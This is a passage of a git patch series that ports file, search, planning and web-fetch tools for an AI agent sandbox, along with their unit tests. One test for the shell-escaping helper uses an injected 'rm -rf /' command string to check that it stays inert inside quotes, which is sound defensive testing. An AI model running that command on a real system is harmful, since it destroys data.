a/lib/agents/generalAgent/getGeneralAgent.ts +++ b/lib/agents/generalAgent/getGeneralAgent.ts @@ -1,4 +1,5 @@ -import { stepCountIs, ToolLoopAgent } from "ai"; +import { ToolLoopAgent } from "ai"; +import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { AnthropicProviderOptions } from "@ai-sdk/anthropic"; import { GoogleGenerativeAIProviderOptions } from "@ai-sdk/google"; import { OpenAIResponsesProviderOptions } from "@ai-sdk/openai"; @@ -52,7 +53,7 @@ export default async function getGeneralAgent(body: ChatRequestBody): Promise Date: Thu, 21 May 2026 13:49:12 -0500 Subject: [PATCH 4/5] =?UTF-8?q?feat(chat-workflow):=20port=207=20leaf=20sa?= =?UTF-8?q?ndbox=20tools=20=E2=80=94=20read/write/edit/grep=E2=80=A6=20(#5?= =?UTF-8?q?85)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * 
feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). 
AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- lib/agent/__tests__/buildAgentTools.test.ts | 34 +++- lib/agent/buildAgentTools.ts | 29 ++- lib/agent/tools/__tests__/bashTool.test.ts | 14 +- .../tools/__tests__/editFileTool.test.ts | 86 +++++++++ lib/agent/tools/__tests__/globTool.test.ts | 97 ++++++++++ lib/agent/tools/__tests__/grepTool.test.ts | 103 +++++++++++ .../tools/__tests__/readFileTool.test.ts | 89 ++++++++++ lib/agent/tools/__tests__/shellEscape.test.ts | 20 +++ .../tools/__tests__/toDisplayPath.test.ts | 29 +++ .../tools/__tests__/todoWriteTool.test.ts | 28 +++ .../tools/__tests__/webFetchTool.test.ts | 96 ++++++++++ .../tools/__tests__/writeFileTool.test.ts | 52 ++++++ lib/agent/tools/bashTool.ts | 109 ++++++------ lib/agent/tools/editFileTool.ts | 100 +++++++++++ lib/agent/tools/globTool.ts | 165 ++++++++++++++++++ lib/agent/tools/grepTool.ts | 143 +++++++++++++++ lib/agent/tools/readFileTool.ts | 70 ++++++++ lib/agent/tools/shellEscape.ts | 14 ++ lib/agent/tools/toDisplayPath.ts | 34 ++++ lib/agent/tools/todoWriteTool.ts | 65 +++++++ lib/agent/tools/webFetchTool.ts | 124 +++++++++++++ lib/agent/tools/writeFileTool.ts | 65 +++++++ 22 files changed, 1491 insertions(+), 75 deletions(-) create mode 100644 lib/agent/tools/__tests__/editFileTool.test.ts create mode 100644 lib/agent/tools/__tests__/globTool.test.ts create mode 100644 lib/agent/tools/__tests__/grepTool.test.ts create mode 100644 lib/agent/tools/__tests__/readFileTool.test.ts 
create mode 100644 lib/agent/tools/__tests__/shellEscape.test.ts create mode 100644 lib/agent/tools/__tests__/toDisplayPath.test.ts create mode 100644 lib/agent/tools/__tests__/todoWriteTool.test.ts create mode 100644 lib/agent/tools/__tests__/webFetchTool.test.ts create mode 100644 lib/agent/tools/__tests__/writeFileTool.test.ts create mode 100644 lib/agent/tools/editFileTool.ts create mode 100644 lib/agent/tools/globTool.ts create mode 100644 lib/agent/tools/grepTool.ts create mode 100644 lib/agent/tools/readFileTool.ts create mode 100644 lib/agent/tools/shellEscape.ts create mode 100644 lib/agent/tools/toDisplayPath.ts create mode 100644 lib/agent/tools/todoWriteTool.ts create mode 100644 lib/agent/tools/webFetchTool.ts create mode 100644 lib/agent/tools/writeFileTool.ts diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts index 52479cad0..5478c59ca 100644 --- a/lib/agent/__tests__/buildAgentTools.test.ts +++ b/lib/agent/__tests__/buildAgentTools.test.ts @@ -1,17 +1,35 @@ import { describe, it, expect } from "vitest"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; +const EXPECTED_TOOL_NAMES = [ + "bash", + "read", + "write", + "edit", + "grep", + "glob", + "todo_write", + "web_fetch", +] as const; + describe("buildAgentTools", () => { - it("returns a tools record keyed by tool name", () => { + it("returns a tools record with all 8 leaf tools registered", () => { const tools = buildAgentTools(); - expect(tools).toHaveProperty("bash"); - expect(typeof tools.bash).toBe("object"); + for (const name of EXPECTED_TOOL_NAMES) { + expect(tools).toHaveProperty(name); + } }); - it("each tool has an inputSchema, description, and execute", () => { - const tools = buildAgentTools(); - expect(tools.bash.inputSchema).toBeDefined(); - expect(tools.bash.description).toBeDefined(); - expect(typeof tools.bash.execute).toBe("function"); + it("each tool exposes the AI SDK shape (description + inputSchema + execute)", 
() => { + const tools = buildAgentTools() as Record< + string, + { description?: unknown; inputSchema?: unknown; execute?: unknown } + >; + for (const name of EXPECTED_TOOL_NAMES) { + const t = tools[name]!; + expect(typeof t.description).toBe("string"); + expect(t.inputSchema).toBeDefined(); + expect(typeof t.execute).toBe("function"); + } }); }); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts index be6bde085..f9cbc2b39 100644 --- a/lib/agent/buildAgentTools.ts +++ b/lib/agent/buildAgentTools.ts @@ -1,4 +1,11 @@ import { bashTool } from "@/lib/agent/tools/bashTool"; +import { readFileTool } from "@/lib/agent/tools/readFileTool"; +import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; +import { editFileTool } from "@/lib/agent/tools/editFileTool"; +import { grepTool } from "@/lib/agent/tools/grepTool"; +import { globTool } from "@/lib/agent/tools/globTool"; +import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; +import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; /** * Factory for the full agent tool set passed into `streamText({ tools })`. @@ -6,14 +13,26 @@ import { bashTool } from "@/lib/agent/tools/bashTool"; * at execute time — the factory takes no arguments because the tools are * stateless modulo that context. * - * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`, - * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`, - * `fetch`) port in follow-up PRs and slot into this record one-by-one - * without changing the factory signature. 
+ * Currently ships 8 leaf tools: + * - bash, read, write, edit, grep, glob (sandbox / file ops) + * - todo_write (planning surface; stateless, echoes the list back) + * - web_fetch (HTTP via curl inside the sandbox) + * + * Composite tools (`task` subagent, `ask_user_question` UI part, + * `skill` skill discovery) port in a follow-up PR — they require + * subagent context plumbing / UI rendering / skill discovery infra + * that isn't in api today. */ export function buildAgentTools() { return { - bash: bashTool(), + bash: bashTool, + read: readFileTool, + write: writeFileTool, + edit: editFileTool, + grep: grepTool, + glob: globTool, + todo_write: todoWriteTool, + web_fetch: webFetchTool, }; } diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts index da9a999d3..568a7f72d 100644 --- a/lib/agent/tools/__tests__/bashTool.test.ts +++ b/lib/agent/tools/__tests__/bashTool.test.ts @@ -34,7 +34,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = await tool.execute!({ command: "ls" }, { experimental_context: baseContext, } as never); @@ -64,7 +64,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "find ." 
}, { experimental_context: baseContext, } as never)) as { truncated?: boolean }; @@ -83,7 +83,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "ls", cwd: "apps/web" }, { experimental_context: baseContext, } as never); @@ -107,7 +107,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "curl example.com" }, { experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, } as never); @@ -121,7 +121,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: baseContext, } as never)) as { success: boolean; stdout: string }; @@ -134,7 +134,7 @@ describe("bashTool.execute", () => { const sandbox = makeSandbox({ execDetached: undefined }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: baseContext, } as never)) as { success: boolean; stderr: string }; @@ -148,7 +148,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, } as never); diff --git a/lib/agent/tools/__tests__/editFileTool.test.ts b/lib/agent/tools/__tests__/editFileTool.test.ts new file mode 100644 index 000000000..3a2cac81d --- /dev/null +++ b/lib/agent/tools/__tests__/editFileTool.test.ts @@ -0,0 +1,86 @@ +import { describe, 
it, expect, vi, beforeEach } from "vitest"; +import { editFileTool } from "@/lib/agent/tools/editFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(initialContent: string) { + let stored = initialContent; + return { + workingDirectory: "/sandbox/mono", + readFile: vi.fn(async () => stored), + writeFile: vi.fn(async (_path: string, content: string) => { + stored = content; + }), + getStored: () => stored, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("editFileTool", () => { + it("replaces a unique oldString once and reports the startLine", async () => { + const sb = makeSandbox("line one\nold value\nline three"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "old value", newString: "new value" }, + { experimental_context: ctx } as never, + )) as { success: boolean; replacements: number; startLine: number }; + expect(result.success).toBe(true); + expect(result.replacements).toBe(1); + expect(result.startLine).toBe(2); + expect(sb.getStored()).toBe("line one\nnew value\nline three"); + }); + + it("rejects when oldString === newString (no-op)", async () => { + const sb = makeSandbox("anything"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!({ filePath: "a.txt", oldString: "x", newString: "x" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/must be different/); + }); + + it("rejects when oldString is not in the file", async () => { + const sb = makeSandbox("hello world"); + 
vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "missing", newString: "other" }, + { experimental_context: ctx } as never, + )) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/not found/); + }); + + it("rejects ambiguous edits (multiple matches without replaceAll)", async () => { + const sb = makeSandbox("foo\nfoo\nbar"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!({ filePath: "a.txt", oldString: "foo", newString: "baz" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/2 times/); + }); + + it("replaces all occurrences when replaceAll:true", async () => { + const sb = makeSandbox("foo bar foo baz foo"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "foo", newString: "qux", replaceAll: true }, + { experimental_context: ctx } as never, + )) as { success: boolean; replacements: number }; + expect(result.success).toBe(true); + expect(result.replacements).toBe(3); + expect(sb.getStored()).toBe("qux bar qux baz qux"); + }); +}); diff --git a/lib/agent/tools/__tests__/globTool.test.ts b/lib/agent/tools/__tests__/globTool.test.ts new file mode 100644 index 000000000..3f35d0a71 --- /dev/null +++ b/lib/agent/tools/__tests__/globTool.test.ts @@ -0,0 +1,97 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { globTool } from "@/lib/agent/tools/globTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, 
workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("globTool", () => { + it("parses `mtime\\tsize\\tpath` output into structured file entries", async () => { + // Two files, newest first (sort already happens server-side in the command). + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: + "1700000000.0\t512\t/sandbox/mono/src/index.ts\n1699999000.5\t256\t/sandbox/mono/src/util.ts", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + const result = (await tool.execute!({ pattern: "**/*.ts" }, { + experimental_context: ctx, + } as never)) as { + success: boolean; + count: number; + files: Array<{ path: string; size: number; modifiedAt: string }>; + }; + expect(result.success).toBe(true); + expect(result.count).toBe(2); + expect(result.files[0]?.path).toBe("src/index.ts"); + expect(result.files[0]?.size).toBe(512); + expect(typeof result.files[0]?.modifiedAt).toBe("string"); // ISO + }); + + it("emits a recursive find (no -maxdepth) for `**/*.ts`", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + await tool.execute!({ pattern: "**/*.ts" }, { experimental_context: ctx } as never); + const cmd = sb.exec.mock.calls[0]?.[0] as string; + expect(cmd).not.toContain("-maxdepth"); + }); + + it("emits -maxdepth 1 for a bare `*.json` pattern (no recursion)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + await 
tool.execute!({ pattern: "*.json" }, { experimental_context: ctx } as never); + expect(sb.exec.mock.calls[0]?.[0]).toMatch(/-maxdepth\s+1/); + }); + + it("returns success:false on non-1 exit codes", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 2, + stdout: "err", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + const result = (await tool.execute!({ pattern: "**/*.ts" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/exit 2/); + }); +}); diff --git a/lib/agent/tools/__tests__/grepTool.test.ts b/lib/agent/tools/__tests__/grepTool.test.ts new file mode 100644 index 000000000..e3545f501 --- /dev/null +++ b/lib/agent/tools/__tests__/grepTool.test.ts @@ -0,0 +1,103 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { grepTool } from "@/lib/agent/tools/grepTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("grepTool", () => { + it("parses `file:line:content` output into structured matches", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: + "/sandbox/mono/src/a.ts:5:export function login() {\n/sandbox/mono/src/a.ts:42: login();\n/sandbox/mono/src/b.ts:7:login()", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "login", path: "src" }, { + 
experimental_context: ctx, + } as never)) as { + success: boolean; + matches: Array<{ file: string; line: number; content: string }>; + filesWithMatches: number; + }; + expect(result.success).toBe(true); + expect(result.matches).toHaveLength(3); + expect(result.matches[0]).toEqual({ + file: "src/a.ts", + line: 5, + content: "export function login() {", + }); + expect(result.filesWithMatches).toBe(2); + }); + + it("treats exit code 1 (no matches) as success:true with empty matches", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 1, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "nothing", path: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; matchCount: number }; + expect(result.success).toBe(true); + expect(result.matchCount).toBe(0); + }); + + it("returns success:false for real grep errors (non-1 exit)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 2, + stdout: "", + stderr: "grep: invalid regex", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "[", path: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/invalid regex/); + }); + + it("passes -i for caseSensitive:false", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + await tool.execute!({ pattern: "x", path: ".", caseSensitive: false }, { + experimental_context: ctx, + } as never); + 
expect(sb.exec.mock.calls[0]?.[0]).toContain(" -i "); + }); +}); diff --git a/lib/agent/tools/__tests__/readFileTool.test.ts b/lib/agent/tools/__tests__/readFileTool.test.ts new file mode 100644 index 000000000..6d1d27fa3 --- /dev/null +++ b/lib/agent/tools/__tests__/readFileTool.test.ts @@ -0,0 +1,89 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { readFileTool } from "@/lib/agent/tools/readFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(over: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + stat: vi.fn(), + readFile: vi.fn(), + ...over, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("readFileTool", () => { + it("reads a file and returns numbered lines", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 10, mtimeMs: 0 }), + readFile: vi.fn().mockResolvedValue("line one\nline two\nline three"), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "README.md" }, { + experimental_context: ctx, + } as never)) as { success: boolean; content: string; totalLines: number; path: string }; + expect(result.success).toBe(true); + expect(result.totalLines).toBe(3); + expect(result.content).toBe("1: line one\n2: line two\n3: line three"); + expect(result.path).toBe("README.md"); + }); + + it("honors offset + limit (1-indexed)", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 0, mtimeMs: 0 }), + readFile: vi.fn().mockResolvedValue("a\nb\nc\nd\ne"), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as 
never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "x.txt", offset: 2, limit: 2 }, { + experimental_context: ctx, + } as never)) as { content: string; startLine: number; endLine: number }; + expect(result.startLine).toBe(2); + // `endLine` is the last line included (1-indexed). With offset=2,limit=2 + // we read lines 2 + 3 of a 5-line file, so endLine=3. + expect(result.endLine).toBe(3); + expect(result.content).toBe("2: b\n3: c"); + }); + + it("rejects directories", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => true, isFile: () => false, size: 0, mtimeMs: 0 }), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/directory/i); + }); + + it("returns success:false with an error string on stat/readFile failure", async () => { + const sb = makeSandbox({ + stat: vi.fn().mockRejectedValue(new Error("not found")), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "missing.ts" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/not found/); + }); +}); diff --git a/lib/agent/tools/__tests__/shellEscape.test.ts b/lib/agent/tools/__tests__/shellEscape.test.ts new file mode 100644 index 000000000..699605129 --- /dev/null +++ b/lib/agent/tools/__tests__/shellEscape.test.ts @@ -0,0 +1,20 @@ +import { describe, it, expect } from "vitest"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; + +describe("shellEscape", () => { + it("wraps a plain string in single quotes", () => { + expect(shellEscape("hello")).toBe("'hello'"); + }); 
+ + it("escapes embedded single quotes via the standard ' → '\\'' dance", () => { + expect(shellEscape("it's")).toBe("'it'\\''s'"); + }); + + it("handles strings with shell metacharacters unchanged inside single quotes", () => { + expect(shellEscape("$VAR `cmd` && rm -rf /")).toBe("'$VAR `cmd` && rm -rf /'"); + }); + + it("returns just '' for the empty string", () => { + expect(shellEscape("")).toBe("''"); + }); +}); diff --git a/lib/agent/tools/__tests__/toDisplayPath.test.ts b/lib/agent/tools/__tests__/toDisplayPath.test.ts new file mode 100644 index 000000000..e862f7276 --- /dev/null +++ b/lib/agent/tools/__tests__/toDisplayPath.test.ts @@ -0,0 +1,29 @@ +import { describe, it, expect } from "vitest"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const WORKDIR = "/sandbox/mono"; + +describe("toDisplayPath", () => { + it("strips the workingDirectory prefix when the file is inside", () => { + expect(toDisplayPath("/sandbox/mono/src/index.ts", WORKDIR)).toBe("src/index.ts"); + }); + + it("returns `.` for the workingDirectory itself", () => { + expect(toDisplayPath("/sandbox/mono", WORKDIR)).toBe("."); + }); + + it("keeps an absolute path when it's outside the working directory", () => { + expect(toDisplayPath("/etc/hosts", WORKDIR)).toBe("/etc/hosts"); + }); + + it("resolves a relative input against the working directory", () => { + expect(toDisplayPath("apps/web/page.tsx", WORKDIR)).toBe("apps/web/page.tsx"); + }); + + it("normalizes back-slashes to forward slashes (Windows-style absolute input)", () => { + // path.resolve on POSIX leaves backslashes inside the segment; the + // helper should still emit forward slashes for paths it keeps absolute. 
+ const result = toDisplayPath("/tmp/win\\path", WORKDIR); + expect(result.includes("\\")).toBe(false); + }); +}); diff --git a/lib/agent/tools/__tests__/todoWriteTool.test.ts b/lib/agent/tools/__tests__/todoWriteTool.test.ts new file mode 100644 index 000000000..7b5d88c9e --- /dev/null +++ b/lib/agent/tools/__tests__/todoWriteTool.test.ts @@ -0,0 +1,28 @@ +import { describe, it, expect } from "vitest"; +import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; + +describe("todoWriteTool", () => { + it("echoes the todos back with a count message", async () => { + const todos = [ + { id: "1", content: "ls the workspace", status: "in_progress" as const }, + { id: "2", content: "summarize what we found", status: "pending" as const }, + ]; + const result = (await todoWriteTool.execute!({ todos }, {} as never)) as { + success: boolean; + message: string; + todos: typeof todos; + }; + expect(result.success).toBe(true); + expect(result.message).toBe("Updated task list with 2 items"); + expect(result.todos).toEqual(todos); + }); + + it("accepts an empty list", async () => { + const result = (await todoWriteTool.execute!({ todos: [] }, {} as never)) as { + success: boolean; + message: string; + }; + expect(result.success).toBe(true); + expect(result.message).toBe("Updated task list with 0 items"); + }); +}); diff --git a/lib/agent/tools/__tests__/webFetchTool.test.ts b/lib/agent/tools/__tests__/webFetchTool.test.ts new file mode 100644 index 000000000..47fb75c92 --- /dev/null +++ b/lib/agent/tools/__tests__/webFetchTool.test.ts @@ -0,0 +1,96 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: 
ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("webFetchTool", () => { + it("parses body + trailing status code on success", async () => { + // Body, then newline, then status code "200" (per the curl -w '%{http_code}' contract). + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: '{"ok":true}\n200', + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/api" }, { + experimental_context: ctx, + } as never)) as { success: boolean; status: number; body: string; truncated: boolean }; + expect(result).toEqual({ + success: true, + status: 200, + body: '{"ok":true}', + truncated: false, + }); + }); + + it("marks truncated:true on curl exit 23 (head -c cut off the body)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 23, + stdout: "huge body fragment\n200", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/huge" }, { + experimental_context: ctx, + } as never)) as { success: boolean; truncated: boolean }; + expect(result.success).toBe(true); + expect(result.truncated).toBe(true); + }); + + it("returns success:false on non-0, non-23 curl exit", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 7, + stdout: "", + stderr: "Failed to connect", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/unreachable" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/Failed to connect/); + }); + + 
it("passes the request body for POST", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "ok\n201", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + await webFetchTool.execute!( + { url: "https://example.com/api", method: "POST", body: '{"x":1}' }, + { experimental_context: ctx } as never, + ); + const cmd = sb.exec.mock.calls[0]?.[0] as string; + expect(cmd).toContain("-X POST"); + expect(cmd).toContain("-d '{\"x\":1}'"); + }); +}); diff --git a/lib/agent/tools/__tests__/writeFileTool.test.ts b/lib/agent/tools/__tests__/writeFileTool.test.ts new file mode 100644 index 000000000..3656a777c --- /dev/null +++ b/lib/agent/tools/__tests__/writeFileTool.test.ts @@ -0,0 +1,52 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(over: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + mkdir: vi.fn().mockResolvedValue(undefined), + writeFile: vi.fn().mockResolvedValue(undefined), + stat: vi + .fn() + .mockResolvedValue({ size: 42, mtimeMs: 0, isDirectory: () => false, isFile: () => true }), + ...over, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("writeFileTool", () => { + it("creates parent dirs and writes content via sandbox.writeFile", async () => { + const sb = makeSandbox(); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = writeFileTool; + const result = (await tool.execute!({ filePath: "src/index.ts", content: "export {}" }, { + 